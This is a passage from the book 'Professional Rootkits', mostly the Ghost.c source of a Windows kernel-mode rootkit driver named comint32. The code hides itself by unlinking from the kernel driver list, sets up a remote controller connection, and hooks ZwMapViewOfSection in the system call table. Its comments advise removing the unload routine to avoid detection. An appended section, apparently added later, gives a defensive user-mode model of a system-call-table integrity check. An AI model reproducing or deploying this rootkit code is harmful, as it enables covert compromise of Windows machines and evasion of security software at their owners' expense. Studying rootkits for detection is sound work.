An Example


The functionality required to hook the kernel system call table has been implemented by creating two new files and modifying two existing files. Remember that every file presented in this and the following chapters can be downloaded from the Wrox/Wiley Professional Rootkits website.

The new files are as follows:

  hookManager.c
  hookManager.h

Following are the modified files:

  Ghost.c
  SOURCES

The code is shown in the following section.

SOURCES

The file hookManager.c has been added to SOURCES:

  TARGETNAME=comint32
  TARGETPATH=OBJ
  TARGETTYPE=DRIVER
  SOURCES=Ghost.c\
          fileManager.c\
          hookManager.c\
          configManager.c

Ghost.c

Three new global variables have been added to Ghost.c: NewSystemCallTable, pMyMDL, and OldZwMapViewOfSection. Once again, NewSystemCallTable and pMyMDL are used to circumvent the possibility of memory protection, and OldZwMapViewOfSection holds the address of the original ZwMapViewOfSection. Note that the value saved in OldZwMapViewOfSection is whatever the system call table held when Hook ran, which is not necessarily the address placed there during system boot: it may already be a hook installed by another rootkit or by security software.

The DriverUnload function has been modified to unhook ZwMapViewOfSection and return the MDL. Again, DriverUnload might not be required in a production environment, but it can be very useful in a development environment.

The only other addition to Ghost.c is the call to Hook. Hook is declared in hookManager.h and implemented in hookManager.c. For simplicity, the more complicated header file will be listed after the implementation file:

  // Ghost
  // Copyright Ric Vieler, 2006

  #include "ntddk.h"
  #include "Ghost.h"
  #include "fileManager.h"
  #include "configManager.h"
  #include "hookManager.h"

  // Used to circumvent memory protected System Call Table
  PVOID* NewSystemCallTable = NULL;
  PMDL pMyMDL = NULL;

  // Pointer(s) to original function(s)
  ZWMAPVIEWOFSECTION OldZwMapViewOfSection;

  // Global version data
  ULONG majorVersion;
  ULONG minorVersion;

  // Comment out in free build to avoid detection
  VOID OnUnload( IN PDRIVER_OBJECT pDriverObject )
  {
    DbgPrint("comint32: OnUnload called.");

    // Unhook any hooked functions and return the Memory Descriptor List
    if( NewSystemCallTable )
    {
      UNHOOK( ZwMapViewOfSection, OldZwMapViewOfSection );
      MmUnmapLockedPages( NewSystemCallTable, pMyMDL );
      IoFreeMdl( pMyMDL );
    }
  }

  NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath )
  {
    DRIVER_DATA* driverData;

    // Get the operating system version
    PsGetVersion( &majorVersion, &minorVersion, NULL, NULL );

    // Major = 4: Windows NT 4.0, Windows Me, Windows 98 or Windows 95
    // Major = 5: Windows Server 2003, Windows XP or Windows 2000
    // Minor = 0: Windows 2000, Windows NT 4.0 or Windows 95
    // Minor = 1: Windows XP
    // Minor = 2: Windows Server 2003
    if ( majorVersion == 5 && minorVersion == 2 )
    {
      DbgPrint("comint32: Running on Windows 2003");
    }
    else if ( majorVersion == 5 && minorVersion == 1 )
    {
      DbgPrint("comint32: Running on Windows XP");
    }
    else if ( majorVersion == 5 && minorVersion == 0 )
    {
      DbgPrint("comint32: Running on Windows 2000");
    }
    else if ( majorVersion == 4 && minorVersion == 0 )
    {
      DbgPrint("comint32: Running on Windows NT 4.0");
    }
    else
    {
      DbgPrint("comint32: Running on unknown system");
    }

    // Hide this driver
    driverData = *((DRIVER_DATA**)((DWORD)pDriverObject + 20));
    if( driverData != NULL )
    {
      // unlink this driver entry from the driver list
      *((PDWORD)driverData->listEntry.Blink) = (DWORD)driverData->listEntry.Flink;
      driverData->listEntry.Flink->Blink = driverData->listEntry.Blink;
    }

    // Comment out in free build to avoid detection
    // (the DriverEntry parameter is pDriverObject; the listing originally read theDriverObject here)
    pDriverObject->DriverUnload = OnUnload;

    // Configure the controller connection
    if( !NT_SUCCESS( Configure() ) )
    {
      DbgPrint("comint32: Could not configure remote connection.\n");
      return STATUS_UNSUCCESSFUL;
    }

    // Hook the System Call Table
    if( !NT_SUCCESS( Hook() ) )
    {
      DbgPrint("comint32: Could not hook the System Call Table.\n");
      return STATUS_UNSUCCESSFUL;
    }

    return STATUS_SUCCESS;
  }
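As an added, defender-side illustration (not code from the book or the comint32 driver), the following user-mode C program models the system call table integrity check a rootkit detector runs to catch a hook like the one installed above: each live entry is compared with a trusted baseline and checked against the image ranges of modules allowed to own table entries. The module ranges, table contents and addresses are constructed sample values, and the baseline is assumed to come from a trusted source such as the on-disk kernel image rather than from the live table, for exactly the reason noted above: a value read from the live table may already belong to someone else's hook.

```c
/* Added example, not from the book: user-mode model of an SSDT integrity check.
 * All tables, module ranges and addresses below are constructed sample values. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef struct { const char *name; uintptr_t base; size_t size; } ModuleRange;

/* Constructed: image ranges of modules that may legitimately own table entries. */
static const ModuleRange kKnownModules[] = {
    { "ntoskrnl.exe", 0x80400000u, 0x200000u },
};

#define SAMPLE_ENTRIES 4
/* Constructed baseline (trusted, e.g. rebuilt from the on-disk kernel) and a live
 * snapshot in which entry 1 was redirected to an address outside every known module
 * and entry 2 was redirected to a different routine inside the kernel image. */
static const uintptr_t kBaseline[SAMPLE_ENTRIES] = { 0x80401000u, 0x80402000u, 0x80403000u, 0x80404000u };
static const uintptr_t kLive[SAMPLE_ENTRIES]     = { 0x80401000u, 0xF8A12000u, 0x80405000u, 0x80404000u };
static unsigned sample_flags[SAMPLE_ENTRIES];

/* Name of the known module containing addr, or NULL if no known module does. */
const char *owner_of(uintptr_t addr) {
    for (size_t i = 0; i < sizeof kKnownModules / sizeof kKnownModules[0]; i++)
        if (addr >= kKnownModules[i].base && addr - kKnownModules[i].base < kKnownModules[i].size)
            return kKnownModules[i].name;
    return NULL;
}

/* Per-entry flags: bit 0 = differs from baseline, bit 1 = outside every known module.
 * Returns the number of entries with any flag set. */
size_t check_ssdt(const uintptr_t *baseline, const uintptr_t *live, size_t n, unsigned *flags) {
    size_t suspicious = 0;
    for (size_t i = 0; i < n; i++) {
        unsigned f = 0;
        if (live[i] != baseline[i]) f |= 1u;
        if (owner_of(live[i]) == NULL) f |= 2u;
        flags[i] = f;
        if (f) suspicious++;
    }
    return suspicious;
}

int main(void) {
    size_t n = check_ssdt(kBaseline, kLive, SAMPLE_ENTRIES, sample_flags);
    for (size_t i = 0; i < SAMPLE_ENTRIES; i++)
        if (sample_flags[i])
            printf("entry %zu -> %#lx flags=%u\n", i, (unsigned long)kLive[i], sample_flags[i]);
    printf("%zu suspicious entries\n", n);
    return 0;
}
```

An entry that differs from the baseline but still points into the kernel image (flag 1 only) is the case a range check alone misses, which is why the baseline comparison is kept alongside it.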




Professional Rootkits (Programmer to Programmer)
ISBN: 0470101547
Year: 2007
Pages: 229
Authors: Ric Vieler
